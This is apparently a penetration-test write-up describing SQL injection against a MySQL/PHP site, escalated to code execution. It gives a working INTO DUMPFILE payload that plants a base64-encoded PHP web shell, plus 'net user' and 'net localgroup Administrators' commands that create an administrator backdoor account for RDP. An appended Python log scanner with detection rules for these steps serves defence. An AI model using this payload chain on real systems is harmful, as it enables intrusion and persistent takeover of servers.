SQL Injection & Remote Code Execution [MySQL]

We use sqlmap to verify the finding, which reveals that the parameter has a SQL injection vulnerability.

We can use the SQL injection to create a file with INTO DUMPFILE and make a simple backdoor encoded with base64.

system($_GET["cmd"]); base64 > c3lzdGVtKCRfR0VUWyJjbWQiXSk7

y=1') UNION ALL SELECT NULL,...,NULL,"<?php eval(base64_decode('c3lzdGVtKCRfR0VUWyJjbWQiXSk7')); ?>",...,NULL into dumpfile 283shell.php -- -

We can access the backdoor and execute the “whoami” command.

Then, using the net user command, we create an account to use RDP.

net user sa *password* /add

Then we add the sa account to the Administrators local group:

net localgroup Administrators sa /add

We log in to RDP with our credentials.

Finally, we are able to log in to RDP.
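Each step above leaves a trace in the web server's access log: the INTO DUMPFILE statement in a query string, then requests to the dropped PHP file carrying whoami, net user and net localgroup. The following is an added example, not part of the original post, that flags those requests; the log lines, IP addresses, the id parameter, the password placeholder and the rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined-log style); not taken from the post.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [01/Jan/2024:10:02:10 +0000] "GET /item.php?id=1%27)%20UNION%20ALL%20SELECT%20NULL,NULL%20INTO%20DUMPFILE%20283shell.php%20--%20- HTTP/1.1" 200 0
203.0.113.5 - - [01/Jan/2024:10:03:00 +0000] "GET /283shell.php?cmd=whoami HTTP/1.1" 200 20
203.0.113.5 - - [01/Jan/2024:10:04:00 +0000] "GET /283shell.php?cmd=net+user+sa+PLACEHOLDER+%2Fadd HTTP/1.1" 200 40
203.0.113.5 - - [01/Jan/2024:10:05:00 +0000] "GET /283shell.php?cmd=net%20localgroup%20Administrators%20sa%20/add HTTP/1.1" 200 40
198.51.100.7 - - [01/Jan/2024:10:06:00 +0000] "GET /search.php?q=union+jobs+into+the+future HTTP/1.1" 200 900
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Hypothetical rule names; each pattern runs against the decoded request target.
RULES = [
    ("sqli-file-write", re.compile(r"\binto\s+(?:dump|out)file\b", re.I)),
    ("webshell-recon", re.compile(r"\.php\?.*=\s*whoami\b", re.I)),
    ("local-account-created", re.compile(r"\bnet1?\s+user\s+\S+.*\s/add\b", re.I)),
    ("admin-group-change", re.compile(r"\bnet1?\s+localgroup\s+administrators\b.*\s/add\b", re.I)),
]

def normalize(target):
    """URL-decode twice (catches double encoding) and treat SQL comments as spaces."""
    for _ in range(2):
        target = unquote_plus(target)
    return re.sub(r"/\*.*?\*/", " ", target)

def scan(log_text):
    """Return (client_ip, rule_name, decoded_request) for every rule hit."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.group(1), normalize(m.group(2))
        for name, pattern in RULES:
            if pattern.search(target):
                hits.append((ip, name, target))
    return hits

if __name__ == "__main__":
    for ip, name, target in scan(SAMPLE_LOG):
        print(f"{name:24} {ip:15} {target}")
```

Only GET query strings are visible in an access log, so POST bodies need a WAF or application-level log to get the same coverage.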

GrimTheRipper
